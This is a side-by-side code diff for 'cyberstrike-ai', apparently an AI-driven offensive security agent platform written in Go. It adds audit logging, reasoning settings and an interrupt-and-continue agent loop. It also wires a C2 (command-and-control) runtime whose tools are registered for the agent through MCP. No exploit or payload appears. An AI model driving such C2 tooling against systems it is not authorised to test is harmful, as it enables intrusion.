h.config.MultiAgent.PlanExecuteLoopMaxIterations = *req.MultiAgent.PlanExecuteLoopMaxIterations h.config.MultiAgent.PlanExecuteLoopMaxIterations = *req.MultiAgent.PlanExecuteLoopMaxIterations
} }
if req.MultiAgent.ToolSearchAlwaysVisibleTools != nil {
h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools = dedupeToolNameList(*req.MultiAgent.ToolSearchAlwaysVisibleTools)
}
h.logger.Info("更新多代理配置", h.logger.Info("更新多代理配置",
zap.Bool("enabled", h.config.MultiAgent.Enabled), zap.Bool("enabled", h.config.MultiAgent.Enabled),
zap.Bool("robot_use_multi_agent", h.config.MultiAgent.RobotUseMultiAgent), zap.String("robot_default_agent_mode", config.NormalizeRobotAgentMode(h.config.MultiAgent)),
zap.Bool("batch_use_multi_agent", h.config.MultiAgent.BatchUseMultiAgent), zap.Bool("batch_use_multi_agent", h.config.MultiAgent.BatchUseMultiAgent),
zap.Int("plan_execute_loop_max_iterations", h.config.MultiAgent.PlanExecuteLoopMaxIterations), zap.Int("plan_execute_loop_max_iterations", h.config.MultiAgent.PlanExecuteLoopMaxIterations),
zap.Int("tool_search_always_visible_tools", len(h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools)),
) )
} }
@@ -813,6 +916,9 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "config", "update", "更新内存配置", "config", "", nil)
}
c.JSON(http.StatusOK, gin.H{"message": "配置已更新"}) c.JSON(http.StatusOK, gin.H{"message": "配置已更新"})
} }
@@ -856,7 +962,7 @@ func (h *ConfigHandler) TestOpenAI(c *gin.Context) {
"messages": []map[string]string{ "messages": []map[string]string{
{"role": "user", "content": "Hi"}, {"role": "user", "content": "Hi"},
}, },
"max_tokens": 5, "max_completion_tokens": 5,
} }
// 使用内部 openai Client 进行测试,若 provider 为 claude 会自动走桥接层 // 使用内部 openai Client 进行测试,若 provider 为 claude 会自动走桥接层
@@ -943,6 +1049,9 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
h.logger.Info("检测到知识库从禁用变为启用,开始动态初始化知识库组件") h.logger.Info("检测到知识库从禁用变为启用,开始动态初始化知识库组件")
if _, err := knowledgeInitializer(); err != nil { if _, err := knowledgeInitializer(); err != nil {
h.logger.Error("动态初始化知识库失败", zap.Error(err)) h.logger.Error("动态初始化知识库失败", zap.Error(err))
if h.audit != nil {
h.audit.RecordFail(c, "config", "apply", "应用配置失败:初始化知识库", map[string]interface{}{"error": err.Error()})
}
c.JSON(http.StatusInternalServerError, gin.H{"error": "初始化知识库失败: " + err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": "初始化知识库失败: " + err.Error()})
return return
} }
@@ -977,12 +1086,30 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
h.logger.Info("开始重新初始化知识库组件(嵌入模型配置已变更)") h.logger.Info("开始重新初始化知识库组件(嵌入模型配置已变更)")
if _, err := reinitKnowledgeInitializer(); err != nil { if _, err := reinitKnowledgeInitializer(); err != nil {
h.logger.Error("重新初始化知识库失败", zap.Error(err)) h.logger.Error("重新初始化知识库失败", zap.Error(err))
if h.audit != nil {
h.audit.RecordFail(c, "config", "apply", "应用配置失败:重新初始化知识库", map[string]interface{}{"error": err.Error()})
}
c.JSON(http.StatusInternalServerError, gin.H{"error": "重新初始化知识库失败: " + err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": "重新初始化知识库失败: " + err.Error()})
return return
} }
h.logger.Info("知识库组件重新初始化完成") h.logger.Info("知识库组件重新初始化完成")
} }
// C2:在 ClearTools 之前按配置启停(随后由 c2ToolRegistrar 注册 MCP 工具)
h.mu.RLock()
c2Rt := h.c2Runtime
h.mu.RUnlock()
if c2Rt != nil {
if err := c2Rt.ReconcileC2AfterConfigApply(); err != nil {
h.logger.Error("C2 配置应用失败", zap.Error(err))
if h.audit != nil {
h.audit.RecordFail(c, "config", "apply", "应用配置失败:C2", map[string]interface{}{"error": err.Error()})
}
c.JSON(http.StatusInternalServerError, gin.H{"error": "C2 启动失败: " + err.Error()})
return
}
}
// 现在获取写锁,执行快速的操作 // 现在获取写锁,执行快速的操作
h.mu.Lock() h.mu.Lock()
defer h.mu.Unlock() defer h.mu.Unlock()
@@ -1047,6 +1174,16 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
} }
} }
// 重新注册 C2 MCP 工具(仅当 C2 已启动)
if h.c2ToolRegistrar != nil {
h.logger.Info("重新注册 C2 MCP 工具")
if err := h.c2ToolRegistrar(); err != nil {
h.logger.Error("重新注册 C2 MCP 工具失败", zap.Error(err))
} else {
h.logger.Info("C2 MCP 工具已处理")
}
}
// 如果知识库启用,重新注册知识库工具 // 如果知识库启用,重新注册知识库工具
if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil { if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil {
h.logger.Info("重新注册知识库工具") h.logger.Info("重新注册知识库工具")
@@ -1061,8 +1198,12 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
if h.agent != nil { if h.agent != nil {
h.agent.UpdateConfig(&h.config.OpenAI) h.agent.UpdateConfig(&h.config.OpenAI)
h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations) h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations)
h.agent.UpdateToolDescriptionMode(h.config.Security.ToolDescriptionMode)
h.logger.Info("Agent配置已更新") h.logger.Info("Agent配置已更新")
} }
if h.mcpServer != nil {
h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes)
}
// 更新AttackChainHandler的OpenAI配置 // 更新AttackChainHandler的OpenAI配置
if h.attackChainHandler != nil { if h.attackChainHandler != nil {
@@ -1105,6 +1246,20 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
zap.Int("tools_count", len(h.config.Security.Tools)), zap.Int("tools_count", len(h.config.Security.Tools)),
) )
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "config",
Action: "apply",
Result: "success",
Message: "配置已应用",
Detail: map[string]interface{}{
"tools_count": len(h.config.Security.Tools),
"knowledge_enabled": h.config.Knowledge.Enabled,
"c2_enabled": h.config.C2.EnabledEffective(),
},
})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"message": "配置已应用", "message": "配置已应用",
"tools_count": len(h.config.Security.Tools), "tools_count": len(h.config.Security.Tools),
@@ -1128,11 +1283,12 @@ func (h *ConfigHandler) saveConfig() error {
return fmt.Errorf("解析配置文件失败: %w", err) return fmt.Errorf("解析配置文件失败: %w", err)
} }
updateAgentConfig(root, h.config.Agent.MaxIterations) updateAgentConfig(root, h.config.Agent)
updateMCPConfig(root, h.config.MCP) updateMCPConfig(root, h.config.MCP)
updateOpenAIConfig(root, h.config.OpenAI) updateOpenAIConfig(root, h.config.OpenAI)
updateFOFAConfig(root, h.config.FOFA) updateFOFAConfig(root, h.config.FOFA)
updateKnowledgeConfig(root, h.config.Knowledge) updateKnowledgeConfig(root, h.config.Knowledge)
updateC2Config(root, h.config.C2)
updateRobotsConfig(root, h.config.Robots) updateRobotsConfig(root, h.config.Robots)
updateHitlConfig(root, h.config.Hitl) updateHitlConfig(root, h.config.Hitl)
updateMultiAgentConfig(root, h.config.MultiAgent) updateMultiAgentConfig(root, h.config.MultiAgent)
@@ -1232,10 +1388,14 @@ func writeYAMLDocument(path string, doc *yaml.Node) error {
return os.WriteFile(path, buf.Bytes(), 0644) return os.WriteFile(path, buf.Bytes(), 0644)
} }
func updateAgentConfig(doc *yaml.Node, maxIterations int) { func updateAgentConfig(doc *yaml.Node, agent config.AgentConfig) {
root := doc.Content[0] root := doc.Content[0]
agentNode := ensureMap(root, "agent") agentNode := ensureMap(root, "agent")
setIntInMap(agentNode, "max_iterations", maxIterations) setIntInMap(agentNode, "max_iterations", agent.MaxIterations)
setIntInMap(agentNode, "tool_timeout_minutes", agent.ToolTimeoutMinutes)
setIntInMap(agentNode, "large_result_threshold", agent.LargeResultThreshold)
setStringInMap(agentNode, "result_storage_dir", agent.ResultStorageDir)
setStringInMap(agentNode, "system_prompt_path", agent.SystemPromptPath)
} }
func updateMCPConfig(doc *yaml.Node, cfg config.MCPConfig) { func updateMCPConfig(doc *yaml.Node, cfg config.MCPConfig) {
@@ -1258,6 +1418,19 @@ func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) {
if cfg.MaxTotalTokens > 0 { if cfg.MaxTotalTokens > 0 {
setIntInMap(openaiNode, "max_total_tokens", cfg.MaxTotalTokens) setIntInMap(openaiNode, "max_total_tokens", cfg.MaxTotalTokens)
} }
rn := ensureMap(openaiNode, "reasoning")
if strings.TrimSpace(cfg.Reasoning.Mode) != "" {
setStringInMap(rn, "mode", cfg.Reasoning.Mode)
}
if strings.TrimSpace(cfg.Reasoning.Effort) != "" {
setStringInMap(rn, "effort", cfg.Reasoning.Effort)
}
if cfg.Reasoning.AllowClientReasoning != nil {
setBoolInMap(rn, "allow_client_reasoning", *cfg.Reasoning.AllowClientReasoning)
}
if strings.TrimSpace(cfg.Reasoning.Profile) != "" {
setStringInMap(rn, "profile", cfg.Reasoning.Profile)
}
} }
func updateFOFAConfig(doc *yaml.Node, cfg config.FofaConfig) { func updateFOFAConfig(doc *yaml.Node, cfg config.FofaConfig) {
@@ -1311,6 +1484,12 @@ func updateKnowledgeConfig(doc *yaml.Node, cfg config.KnowledgeConfig) {
setIntInMap(indexingNode, "retry_delay_ms", cfg.Indexing.RetryDelayMs) setIntInMap(indexingNode, "retry_delay_ms", cfg.Indexing.RetryDelayMs)
} }
func updateC2Config(doc *yaml.Node, cfg config.C2Config) {
root := doc.Content[0]
c2Node := ensureMap(root, "c2")
setBoolInMap(c2Node, "enabled", cfg.EnabledEffective())
}
func mergeHitlToolWhitelistSlice(existing, add []string) []string { func mergeHitlToolWhitelistSlice(existing, add []string) []string {
seen := make(map[string]struct{}) seen := make(map[string]struct{})
out := make([]string, 0, len(existing)+len(add)) out := make([]string, 0, len(existing)+len(add))
@@ -1356,6 +1535,20 @@ func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) {
root := doc.Content[0] root := doc.Content[0]
robotsNode := ensureMap(root, "robots") robotsNode := ensureMap(root, "robots")
if cfg.Session.StrictUserIdentity != nil {
sessionNode := ensureMap(robotsNode, "session")
setBoolInMap(sessionNode, "strict_user_identity", *cfg.Session.StrictUserIdentity)
}
wechatNode := ensureMap(robotsNode, "wechat")
setBoolInMap(wechatNode, "enabled", cfg.Wechat.Enabled)
setStringInMap(wechatNode, "bot_token", cfg.Wechat.BotToken)
setStringInMap(wechatNode, "ilink_bot_id", cfg.Wechat.ILinkBotID)
setStringInMap(wechatNode, "ilink_user_id", cfg.Wechat.ILinkUserID)
setStringInMap(wechatNode, "base_url", cfg.Wechat.BaseURL)
setStringInMap(wechatNode, "bot_type", cfg.Wechat.BotType)
setStringInMap(wechatNode, "bot_agent", cfg.Wechat.BotAgent)
wecomNode := ensureMap(robotsNode, "wecom") wecomNode := ensureMap(robotsNode, "wecom")
setBoolInMap(wecomNode, "enabled", cfg.Wecom.Enabled) setBoolInMap(wecomNode, "enabled", cfg.Wecom.Enabled)
setStringInMap(wecomNode, "token", cfg.Wecom.Token) setStringInMap(wecomNode, "token", cfg.Wecom.Token)
@@ -1368,21 +1561,50 @@ func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) {
setBoolInMap(dingtalkNode, "enabled", cfg.Dingtalk.Enabled) setBoolInMap(dingtalkNode, "enabled", cfg.Dingtalk.Enabled)
setStringInMap(dingtalkNode, "client_id", cfg.Dingtalk.ClientID) setStringInMap(dingtalkNode, "client_id", cfg.Dingtalk.ClientID)
setStringInMap(dingtalkNode, "client_secret", cfg.Dingtalk.ClientSecret) setStringInMap(dingtalkNode, "client_secret", cfg.Dingtalk.ClientSecret)
setBoolInMap(dingtalkNode, "allow_conversation_id_fallback", cfg.Dingtalk.AllowConversationIDFallback)
larkNode := ensureMap(robotsNode, "lark") larkNode := ensureMap(robotsNode, "lark")
setBoolInMap(larkNode, "enabled", cfg.Lark.Enabled) setBoolInMap(larkNode, "enabled", cfg.Lark.Enabled)
setStringInMap(larkNode, "app_id", cfg.Lark.AppID) setStringInMap(larkNode, "app_id", cfg.Lark.AppID)
setStringInMap(larkNode, "app_secret", cfg.Lark.AppSecret) setStringInMap(larkNode, "app_secret", cfg.Lark.AppSecret)
setStringInMap(larkNode, "verify_token", cfg.Lark.VerifyToken) setStringInMap(larkNode, "verify_token", cfg.Lark.VerifyToken)
setBoolInMap(larkNode, "allow_chat_id_fallback", cfg.Lark.AllowChatIDFallback)
} }
func updateMultiAgentConfig(doc *yaml.Node, cfg config.MultiAgentConfig) { func updateMultiAgentConfig(doc *yaml.Node, cfg config.MultiAgentConfig) {
root := doc.Content[0] root := doc.Content[0]
maNode := ensureMap(root, "multi_agent") maNode := ensureMap(root, "multi_agent")
setBoolInMap(maNode, "enabled", cfg.Enabled) setBoolInMap(maNode, "enabled", cfg.Enabled)
setBoolInMap(maNode, "robot_use_multi_agent", cfg.RobotUseMultiAgent) setStringInMap(maNode, "robot_default_agent_mode", config.NormalizeRobotAgentMode(cfg))
setBoolInMap(maNode, "batch_use_multi_agent", cfg.BatchUseMultiAgent) setBoolInMap(maNode, "batch_use_multi_agent", cfg.BatchUseMultiAgent)
setIntInMap(maNode, "plan_execute_loop_max_iterations", cfg.PlanExecuteLoopMaxIterations) setIntInMap(maNode, "plan_execute_loop_max_iterations", cfg.PlanExecuteLoopMaxIterations)
mwNode := ensureMap(maNode, "eino_middleware")
setFlowStringSliceInMap(mwNode, "tool_search_always_visible_tools", dedupeToolNameList(cfg.EinoMiddleware.ToolSearchAlwaysVisibleTools))
}
func dedupeToolNameList(in []string) []string {
if len(in) == 0 {
return []string{}
}
seen := make(map[string]struct{}, len(in))
out := make([]string, 0, len(in))
for _, name := range in {
n := strings.TrimSpace(name)
if n == "" {
continue
}
key := strings.ToLower(n)
if _, ok := seen[key]; ok {
continue
}
seen[key] = struct{}{}
out = append(out, n)
}
return out
}
func mergeToolNameLists(a, b []string) []string {
return dedupeToolNameList(append(append([]string{}, a...), b...))
} }
func ensureMap(parent *yaml.Node, path ...string) *yaml.Node { func ensureMap(parent *yaml.Node, path ...string) *yaml.Node {
+27 -2
View File
@@ -5,6 +5,7 @@ import (
"net/http" "net/http"
"strconv" "strconv"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
@@ -14,6 +15,12 @@ import (
type ConversationHandler struct { type ConversationHandler struct {
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *ConversationHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewConversationHandler 创建新的对话处理器 // NewConversationHandler 创建新的对话处理器
@@ -42,7 +49,7 @@ func (h *ConversationHandler) CreateConversation(c *gin.Context) {
title = "新对话" title = "新对话"
} }
conv, err := h.db.CreateConversation(title) conv, err := h.db.CreateConversation(title, audit.ConversationCreateMetaFromGin(c, "api"))
if err != nil { if err != nil {
h.logger.Error("创建对话失败", zap.Error(err)) h.logger.Error("创建对话失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
@@ -117,6 +124,8 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
return return
} }
details = database.DedupeConsecutiveProcessDetails(details)
// 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致) // 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致)
out := make([]map[string]interface{}, 0, len(details)) out := make([]map[string]interface{}, 0, len(details))
for _, d := range details { for _, d := range details {
@@ -187,6 +196,17 @@ func (h *ConversationHandler) DeleteConversation(c *gin.Context) {
return return
} }
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "conversation",
Action: "delete",
Result: "success",
ResourceType: "conversation",
ResourceID: id,
Message: "删除对话",
})
}
c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) c.JSON(http.StatusOK, gin.H{"message": "删除成功"})
} }
@@ -225,9 +245,14 @@ func (h *ConversationHandler) DeleteConversationTurn(c *gin.Context) {
return return
} }
if h.audit != nil {
h.audit.RecordOK(c, "conversation", "delete_turn", "删除对话轮次", "conversation", conversationID, map[string]interface{}{
"message_id": req.MessageID,
"deleted": len(deletedIDs),
})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"deletedMessageIds": deletedIDs, "deletedMessageIds": deletedIDs,
"message": "ok", "message": "ok",
}) })
} }
+132 -76
View File
@@ -10,6 +10,7 @@ import (
"sync" "sync"
"time" "time"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/multiagent" "cyberstrike-ai/internal/multiagent"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
@@ -43,8 +44,11 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
var sseWriteMu sync.Mutex var sseWriteMu sync.Mutex
var ssePublishConversationID string var ssePublishConversationID string
sendEvent := func(eventType, message string, data interface{}) { sendEvent := func(eventType, message string, data interface{}) {
if eventType == "error" && baseCtx != nil && errors.Is(context.Cause(baseCtx), ErrTaskCancelled) { if eventType == "error" && baseCtx != nil {
return cause := context.Cause(baseCtx)
if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) {
return
}
} }
ev := StreamEvent{Type: eventType, Message: message, Data: data} ev := StreamEvent{Type: eventType, Message: message, Data: data}
b, errMarshal := json.Marshal(ev) b, errMarshal := json.Marshal(ev)
@@ -86,7 +90,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
zap.String("conversationId", req.ConversationID), zap.String("conversationId", req.ConversationID),
) )
prep, err := h.prepareMultiAgentSession(&req) prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent_stream")
if err != nil { if err != nil {
sendEvent("error", err.Error(), nil) sendEvent("error", err.Error(), nil)
sendEvent("done", "", nil) sendEvent("done", "", nil)
@@ -114,36 +118,19 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
} }
var cancelWithCause context.CancelCauseFunc var cancelWithCause context.CancelCauseFunc
baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) curFinalMessage := prep.FinalMessage
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) curHistory := prep.History
defer timeoutCancel() roleTools := prep.RoleTools
defer cancelWithCause(nil)
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
})
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
var errorMsg string
if errors.Is(err, ErrTaskAlreadyRunning) {
errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
sendEvent("error", errorMsg, map[string]interface{}{
"conversationId": conversationID,
"errorType": "task_already_running",
})
} else {
errorMsg = "❌ 无法启动任务: " + err.Error()
sendEvent("error", errorMsg, nil)
}
if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errorMsg, assistantMessageID)
}
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
return
}
taskStatus := "completed" taskStatus := "completed"
defer h.tasks.FinishTask(conversationID, taskStatus) // 仅在成功 StartTask 后再 FinishTask。若 StartTask 因 ErrTaskAlreadyRunning 失败仍 defer FinishTask
// 会误删其他连接上正在运行的同会话任务,导致「第一次拦截、第二次却放行」。
taskOwned := false
defer func() {
if taskOwned {
h.tasks.FinishTask(conversationID, taskStatus)
}
}()
sendEvent("progress", "正在启动 Eino ADK 单代理(ChatModelAgent...", map[string]interface{}{ sendEvent("progress", "正在启动 Eino ADK 单代理(ChatModelAgent...", map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
@@ -161,27 +148,112 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
return return
} }
result, runErr := multiagent.RunEinoSingleChatModelAgent( var result *multiagent.RunResult
taskCtx, var runErr error
h.config,
&h.config.MultiAgent, baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.agent, taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
h.logger,
conversationID, if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
prep.FinalMessage, var errorMsg string
prep.History, if errors.Is(err, ErrTaskAlreadyRunning) {
prep.RoleTools, errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。"
progressCallback, sendEvent("error", errorMsg, map[string]interface{}{
) "conversationId": conversationID,
"errorType": "task_already_running",
})
} else {
errorMsg = "❌ 无法启动任务: " + err.Error()
sendEvent("error", errorMsg, nil)
}
if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
}
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
timeoutCancel()
return
}
taskOwned = true
var cumulativeMCPExecutionIDs []string
for {
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
})
result, runErr = multiagent.RunEinoSingleChatModelAgent(
taskCtxLoop,
h.config,
&h.config.MultiAgent,
h.agent,
h.logger,
conversationID,
curFinalMessage,
curHistory,
roleTools,
progressCallback,
chatReasoningToClientIntent(req.Reasoning),
)
timeoutCancel()
if result != nil && len(result.MCPExecutionIDs) > 0 {
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
}
if runErr == nil {
break
}
if runErr != nil {
cause := context.Cause(baseCtx) cause := context.Cause(baseCtx)
if errors.Is(cause, multiagent.ErrInterruptContinue) {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
note := h.tasks.TakeInterruptContinueNote(conversationID)
icSummary := interruptContinueTimelineSummary(note)
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
"conversationId": conversationID,
"rawReason": strings.TrimSpace(note),
"emptyReason": strings.TrimSpace(note) == "",
"kind": "no_active_mcp_tool",
})
inject := formatInterruptContinueUserMessage(note)
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
curHistory = hist
}
curFinalMessage = inject
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
"conversationId": conversationID,
"source": "interrupt_continue",
})
h.tasks.UpdateTaskStatus(conversationID, "running")
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
continue
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
if errors.Is(cause, ErrTaskCancelled) { if errors.Is(cause, ErrTaskCancelled) {
taskStatus = "cancelled" taskStatus = "cancelled"
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
cancelMsg := "任务已被用户取消,后续操作已停止。" cancelMsg := "任务已被用户取消,后续操作已停止。"
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", cancelMsg, assistantMessageID) if result != nil {
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
}
}
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
}
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
} }
sendEvent("cancelled", cancelMsg, map[string]interface{}{ sendEvent("cancelled", cancelMsg, map[string]interface{}{
@@ -197,7 +269,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
timeoutMsg := "任务执行超时,已自动终止。" timeoutMsg := "任务执行超时,已自动终止。"
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", timeoutMsg, assistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
} }
sendEvent("error", timeoutMsg, map[string]interface{}{ sendEvent("error", timeoutMsg, map[string]interface{}{
@@ -214,7 +286,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
h.tasks.UpdateTaskStatus(conversationID, taskStatus) h.tasks.UpdateTaskStatus(conversationID, taskStatus)
errMsg := "执行失败: " + runErr.Error() errMsg := "执行失败: " + runErr.Error()
if assistantMessageID != "" { if assistantMessageID != "" {
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID) _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil) _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
} }
sendEvent("error", errMsg, map[string]interface{}{ sendEvent("error", errMsg, map[string]interface{}{
@@ -226,27 +298,17 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
} }
if assistantMessageID != "" { if assistantMessageID != "" {
mcpIDsJSON := "" _ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
if len(result.MCPExecutionIDs) > 0 {
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
mcpIDsJSON = string(jsonData)
}
_, _ = h.db.Exec(
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
result.Response,
mcpIDsJSON,
assistantMessageID,
)
} }
if result.LastReActInput != "" || result.LastReActOutput != "" { if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
if err := h.db.SaveReActData(conversationID, result.LastReActInput, result.LastReActOutput); err != nil { if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil {
h.logger.Warn("保存 ReAct 数据失败", zap.Error(err)) h.logger.Warn("保存代理轨迹失败", zap.Error(err))
} }
} }
sendEvent("response", result.Response, map[string]interface{}{ sendEvent("response", result.Response, map[string]interface{}{
"mcpExecutionIds": result.MCPExecutionIDs, "mcpExecutionIds": cumulativeMCPExecutionIDs,
"conversationId": conversationID, "conversationId": conversationID,
"messageId": assistantMessageID, "messageId": assistantMessageID,
"agentMode": "eino_single", "agentMode": "eino_single",
@@ -264,7 +326,7 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
h.logger.Info("收到 Eino ADK 单代理非流式请求", zap.String("conversationId", req.ConversationID)) h.logger.Info("收到 Eino ADK 单代理非流式请求", zap.String("conversationId", req.ConversationID))
prep, err := h.prepareMultiAgentSession(&req) prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent")
if err != nil { if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return return
@@ -304,27 +366,21 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
prep.History, prep.History,
prep.RoleTools, prep.RoleTools,
progressCallback, progressCallback,
chatReasoningToClientIntent(req.Reasoning),
) )
if runErr != nil { if runErr != nil {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
}
c.JSON(http.StatusInternalServerError, gin.H{"error": runErr.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": runErr.Error()})
return return
} }
if prep.AssistantMessageID != "" { if prep.AssistantMessageID != "" {
mcpIDsJSON := "" _ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
if len(result.MCPExecutionIDs) > 0 {
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
